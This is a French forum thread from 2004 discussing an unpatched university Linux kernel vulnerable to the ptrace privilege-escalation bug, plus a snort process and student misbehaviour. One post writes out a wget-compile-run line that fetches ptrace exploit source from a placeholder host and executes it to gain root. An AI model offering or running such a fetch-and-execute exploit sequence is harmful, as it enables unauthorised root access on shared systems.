Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1219 connectés 

 


 Mot :   Pseudo :  
 
 Page :   1  2
Page Suivante
Auteur Sujet :

Virer SSH = meilleure sécurité ???

n°452611
Mjules
Modérateur
Parle dans le vide
Posté le 09-04-2004 à 17:40:10  profilanswer
 

Reprise du message précédent :
le 2.4.18 Debian est patché ptrace (au moins et probablement les autres mais là vu la date, c'est pas gagné)


---------------
Celui qui pose une question est idiot 5 minutes. Celui qui n'en pose pas le reste toute sa vie. |  Membre du grand complot pharmaceutico-médico-scientifico-judéo-maçonnique.
mood
Publicité
Posté le 09-04-2004 à 17:40:10  profilanswer
 

n°452616
AirbaT
Connection timed out
Posté le 09-04-2004 à 17:43:58  profilanswer
 

Oui, le 2.4.18-bf2.4 que tu installes maintenant. Mais pas le sien =) Il ya fort à parier que toutes les applications sont sujettes à des failles puisque non mises à jours. SSH compris (ya eu des failles ssh depuis 2 ans non ?)

n°452618
Mjules
Modérateur
Parle dans le vide
Posté le 09-04-2004 à 17:45:45  profilanswer
 

AirbaT a écrit :

Oui, le 2.4.18-bf2.4 que tu installes maintenant. Mais pas le sien =) Il ya fort à parier que toutes les applications sont sujettes à des failles puisque non mises à jours. SSH compris (ya eu des failles ssh depuis 2 ans non ?)


pas sur pour les failles services ; par contre c'est clair que le kernel là c'est pas terrible ; c'est quelle fac  :whistle:


---------------
Celui qui pose une question est idiot 5 minutes. Celui qui n'en pose pas le reste toute sa vie. |  Membre du grand complot pharmaceutico-médico-scientifico-judéo-maçonnique.
n°452621
black_lord
Modérateur
Truth speaks from peacefulness
Posté le 09-04-2004 à 17:49:42  profilanswer
 

Mjules a écrit :


pas sur pour les failles services ; par contre c'est clair que le kernel là c'est pas terrible ; c'est quelle fac  :whistle:  


 
tiens ;) tu as accès à ces machines là aussi toi  :whistle:
 
J'ai remarqué qu'il y avait une sonde qui trainait sur le réseau  
 
un ps donne :


20025 ?        S      0:48 /usr/sbin/snort -D -S HOME_NET=[192.168.0.0/16] -h 192.168.0.0/16 -c /etc/snort/snort.conf -l /var/log/snort -b -d -u snort -g snort -i eth0


 
J'ai pas snort mais là il surveille quoi ?

n°452701
Sly Angel
Architecte / Développeur principal
Posté le 09-04-2004 à 20:13:32  profilanswer
 

udok a écrit :


 
la ptrace a fait du bruit parce qu'elle a été exploité mais je suis pas sur que les autres soient plus sympthiques [:joce]  (ce ne sont que des suppositions hein :o )


 
Disons qu'elle est très simple a exploiter et que c'est une faille kernel quoi, c'est pas dépendant d'autre chose :/
 
Une faille kernel simple à exploiter qui permet directement de passer root dès que tu as un compte user, pour une fac je trouve que c'est le plus critique :o

n°452705
udok
La racaille des barbus ©clémen
Posté le 09-04-2004 à 20:19:56  profilanswer
 

Sly Angel a écrit :


 
Disons qu'elle est très simple a exploiter et que c'est une faille kernel quoi, c'est pas dépendant d'autre chose :/
 
Une faille kernel simple à exploiter qui permet directement de passer root dès que tu as un compte user, pour une fac je trouve que c'est le plus critique :o
 


 
oui oui, je sais bien, mais il me semble qu'il y en a eu d'autres, même depuis, mais qu'on en a moins parlé
peut-être qu'elles n'étaient pas aussi grave en faite, mais c'est pourtant ce qu'il me semblait


---------------
Non au projet de loi DADVSI ! (droits d'auteurs)
n°452709
Sly Angel
Architecte / Développeur principal
Posté le 09-04-2004 à 20:32:55  profilanswer
 

udok a écrit :


 
oui oui, je sais bien, mais il me semble qu'il y en a eu d'autres, même depuis, mais qu'on en a moins parlé
peut-être qu'elles n'étaient pas aussi grave en faite, mais c'est pourtant ce qu'il me semblait


 
Sur le kernel oui, avec le mapping de la mémoire il me semble, mais c'était bcp plus délicat à reproduire que ptrace, si tu cherches un exploit tout fait ( on sait tous que typiquement les étudiants cherchent ça sur le net et ne comprennent même pas comment ça fonctionne ), c'est très rapide pour ptrace, tandis que pour les 2 suivantes c'est très difficile il me semble de les reproduire, donc ça demande plus de compétences.
 
ptrace à partir du moment ou tu sais faire wget http://machintruc.com/ptrace.c ; gcc -o ptrace.c ptrace ; ./ptrace , tu peux passer root sur la machine :o

n°452710
AirbaT
Connection timed out
Posté le 09-04-2004 à 20:37:10  profilanswer
 

Oui :D Mais moi je fais gcc ptrace.c -o ptrace :o
Ca m'a pris 4 minutes entre le moment où j'ai commencé à chercher et le moment ou il etait compilé. Et encore je cherche jamais ce genre de truc, alors pour quelqu'un qui est habitué !

n°452715
Sly Angel
Architecte / Développeur principal
Posté le 09-04-2004 à 20:43:24  profilanswer
 

AirbaT a écrit :

Oui :D Mais moi je fais gcc ptrace.c -o ptrace :o
Ca m'a pris 4 minutes entre le moment où j'ai commencé à chercher et le moment ou il etait compilé. Et encore je cherche jamais ce genre de truc, alors pour quelqu'un qui est habitué !


 
merde quelle nouille j'ai écrit nawak :lol:
 
bah voilà, ptrace c'est clairement l'exploit critique super simple à utiliser :/


Message édité par Sly Angel le 09-04-2004 à 21:30:10
n°452723
AirbaT
Connection timed out
Posté le 09-04-2004 à 21:00:21  profilanswer
 

nanan c'est bon ce que tu fais aussi huhu ;)

mood
Publicité
Posté le 09-04-2004 à 21:00:21  profilanswer
 

n°452727
Sly Angel
Architecte / Développeur principal
Posté le 09-04-2004 à 21:04:27  profilanswer
 

AirbaT a écrit :

nanan c'est bon ce que tu fais aussi huhu ;)


 
nop, j'ai inversé le binaire et le .c :o


Message édité par Sly Angel le 09-04-2004 à 21:04:49
n°452728
GUG
Posté le 09-04-2004 à 21:06:11  profilanswer
 

on a vu ;) [:joce]

n°452729
AirbaT
Connection timed out
Posté le 09-04-2004 à 21:06:47  profilanswer
 

Ca m'apprendra à lire en travers...

n°452747
the_fireba​ll
I have fucking failed
Posté le 09-04-2004 à 21:37:06  profilanswer
 

c'est clair que ce genre de faille, c'est la porte ouverte aux abus. Je me suis servi de ptrace sur un vieux serveur linux en 2.2.14 car on avait perdu le pass root et j'ai mis moins de 5 minutes pour trouver le sources sur le net et le compilé. APres deux essai, j'étais root et je pouvais changer le pass. Et ce genre de truc dans une fac, c'est la looze total car les étudiants, ce sont des reloos, n'est ce pas :D


---------------
Two thousand years of misery, of torture in my name, hypocrisy made paramount, paranoia the law, my name is called religion, sadistic, sacred whore.
n°452749
Sly Angel
Architecte / Développeur principal
Posté le 09-04-2004 à 21:44:34  profilanswer
 

C'est clair :lol:
 
Surtout ceux qui se la pètent "hacker" parce qu'ils ont recopié un bête bout de code trouvé sur le net pour passer root [:mlc]


Message édité par Sly Angel le 09-04-2004 à 21:44:56
n°452750
GUG
Posté le 09-04-2004 à 21:44:44  profilanswer
 

aux admins de faire leur boulot aussi :o et puis tous les etudiants ne sont pas des mechants (moi par exemple) mais bon il suffit d'un suel :D

n°452751
GUG
Posté le 09-04-2004 à 21:46:10  profilanswer
 

et vive les warlords :gun: on m'a bien sortit l'annee derniere: j'ai  la derniere build de windows xp elle dechire tout :/ ou dans le genre : regarde regarde je peux acceder à tou mon disque depuis ici :/ (ce boulet avait mis un server fp t en rw sur tout son disque dur)

n°452752
Sly Angel
Architecte / Développeur principal
Posté le 09-04-2004 à 21:46:36  profilanswer
 

GUG a écrit :

aux admins de faire leur boulot aussi :o et puis tous les etudiants ne sont pas des mechants (moi par exemple) mais bon il suffit d'un suel :D


 
Oui c'est vrai aussi, mais y'en a toujours 2 3 pour être comme ça, y'en a 10-20 qui le feront et se contenteront de juste regarder sans faire chier, et 1 ou 2 qui feront les cons avec ça.
 
Dans tous les cas c'est la loose :o

n°452756
udok
La racaille des barbus ©clémen
Posté le 09-04-2004 à 21:57:16  profilanswer
 

the_fireball a écrit :

c'est clair que ce genre de faille, c'est la porte ouverte aux abus. Je me suis servi de ptrace sur un vieux serveur linux en 2.2.14 car on avait perdu le pass root et j'ai mis moins de 5 minutes pour trouver le sources sur le net et le compilé. APres deux essai, j'étais root et je pouvais changer le pass. Et ce genre de truc dans une fac, c'est la looze total car les étudiants, ce sont des reloos, n'est ce pas :D


 
"it's not a bug, it's a feature" © [:aloy]


---------------
Non au projet de loi DADVSI ! (droits d'auteurs)
n°452757
python
Posté le 09-04-2004 à 21:59:00  profilanswer
 

Sly Angel a écrit :


 
Oui c'est vrai aussi, mais y'en a toujours 2 3 pour être comme ça, y'en a 10-20 qui le feront et se contenteront de juste regarder sans faire chier, et 1 ou 2 qui feront les cons avec ça.
 
Dans tous les cas c'est la loose :o


 
Quand j'étais étudiant en 2000, dans les labos sous windows, c'était avec Backorifice 2K que les étudiants s'amusaient à faire planter les PC. J'en ai vu s'amuser à mettre les touches des vieux clavier IBM en ordre alphabétique. D'autres surfaient en plein cours sur des sites pornos explicites et ont changé les fonds d'écrans pour des femmes nues ou à faire une LAN de CS alors que c'est interdit. Bref, le genre d'étudiant... :/ qui ne vont faire le cours que pour passer le temps et qui ne sont pas nécessairement pasionnés par l'informatique :fou:  
 

n°452762
GUG
Posté le 09-04-2004 à 22:17:48  profilanswer
 

je connais ....

n°452766
mober
Mécréant Notoire
Posté le 09-04-2004 à 22:50:51  profilanswer
 

black_lord a écrit :


 
tiens ;) tu as accès à ces machines là aussi toi  :whistle:
 
J'ai remarqué qu'il y avait une sonde qui trainait sur le réseau  
 
un ps donne :


20025 ?        S      0:48 /usr/sbin/snort -D -S HOME_NET=[192.168.0.0/16] -h 192.168.0.0/16 -c /etc/snort/snort.conf -l /var/log/snort -b -d -u snort -g snort -i eth0


 
J'ai pas snort mais là il surveille quoi ?


 
Il écoute le trafic sur le réseau local ... les alertes qu'il donne sont fonction des règles qu'on lui applique, là c juste une commande de démarrage :)

n°452773
black_lord
Modérateur
Truth speaks from peacefulness
Posté le 09-04-2004 à 23:34:01  profilanswer
 

les règles sont en lecture pour tous, et en plus l'exploit ptrace n'y figure pas... :pfff:

mood
Publicité
Posté le   profilanswer
 

 Page :   1  2
Page Suivante

Aller à :
Ajouter une réponse
 

Sujets relatifs
Chroot + Mount Bind = Sécurité ?[mdk10] logiciel de test de sécurité genre Xscan
SOS cherche info sur sécurité du poste de travailsécurité réseau
Virer Lilo ?[ Sécurité ] l'Ext3 et les droits sous windows
Ssh + nom de machineVirer ce foutu raccourci de gnome-terminal
Un bon bouquin sur la sécuritéComment virer le multiboot apres avoir désinstaller mandrake 9.1 ?
Plus de sujets relatifs à : Virer SSH = meilleure sécurité ???


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR